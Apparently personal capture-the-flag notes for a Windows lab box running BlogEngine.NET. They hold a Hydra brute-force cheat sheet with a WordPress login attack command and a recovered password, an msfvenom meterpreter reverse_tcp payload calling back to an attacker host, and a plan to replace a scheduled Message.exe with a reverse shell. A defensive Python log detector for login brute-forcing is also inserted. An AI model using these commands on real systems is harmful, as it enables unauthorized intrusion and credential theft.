1. Google reverse image search

  2. Hydra - parallelized, fast and flexible login cracker
     post: the type of request a Windows website login would use
     get request payload: Network > All > post request > Request Payload
     command format:
       hydra -l <user> -P ./<wordlist> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
     login: admin
     password: 1qaz2wsx

hydra cheat sheet (command, then description):

  hydra -P <wordlist> -v <ip> <protocol>
      Brute force against a protocol of your choice.
  hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>
      You can use Hydra to brute-force usernames as well as passwords. It will loop through every combination in your lists (-vV = verbose mode, showing login attempts).
  hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>
      Attack a Windows Remote Desktop with a password list.
  hydra -l <user> -P ./<wordlist> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
      Craft a more specific request for Hydra to brute force.
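Defender's view of the http-form-post pattern above, as an added example that is not part of the original notes: a small Python detector that reads web-server access-log lines, groups POSTs to /wp-login.php by source IP, flags a burst above a threshold inside a time window, and reports whether a redirect followed the burst (a 302 is the same condition the S=Location success key in the hydra command matches on). The log lines, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (common log format); not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3452
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3452
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3452
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3452
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3452
10.0.0.5 - - [12/Mar/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0
10.0.0.9 - - [12/Mar/2024:10:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3452
10.0.0.9 - - [12/Mar/2024:10:05:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def detect_login_bruteforce(log_text, threshold=5, window_s=60, login_path="/wp-login.php"):
    """Return {ip: {"attempts", "burst", "redirect_after_burst"}} for POSTs to login_path.

    burst: at least `threshold` POSTs from one IP inside any `window_s`-second window.
    redirect_after_burst: a 301/302 reply at or after the burst, the same signal hydra's
    S=Location success condition keys on, so it marks a guess that probably worked.
    """
    posts = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"] == login_path:
            ts = datetime.strptime(m["ts"], TS_FMT)
            posts[m["ip"]].append((ts, int(m["status"])))
    findings = {}
    for ip, events in posts.items():
        events.sort()
        start, burst_end = 0, None
        for i, (ts, _status) in enumerate(events):
            # advance the window start until events[start..i] all fall within window_s
            while ts - events[start][0] > timedelta(seconds=window_s):
                start += 1
            if i - start + 1 >= threshold:
                burst_end = i
        burst = burst_end is not None
        redirect = burst and any(s in (301, 302) for _, s in events[burst_end:])
        findings[ip] = {"attempts": len(events), "burst": burst,
                        "redirect_after_burst": redirect}
    return findings
```

Feed it a real access log (one line per request) and tune threshold and window_s to your site's normal login rate; an IP with burst and redirect_after_burst both true is the one to investigate first.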

  1. Enumerate the website
     - find BlogEngine.NET, version 3.3.6.0
     - search for an exploit
     - gain initial access

  2. Gain a reverse TCP shell using msfvenom
       msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.. LPORT=2345 -f exe -o revshell.exe
     - serve the file using a Python web server: python3 -m http.server
     - get access to meterpreter

  3. Escalate privileges
     - use windows-exploit-suggester
     - find an abnormal service: WindowsScheduler.exe runs Message.exe every 30 seconds
     - goal is to create a 'Message.exe' reverse shell to gain higher privileges

  4. Find the root and user flags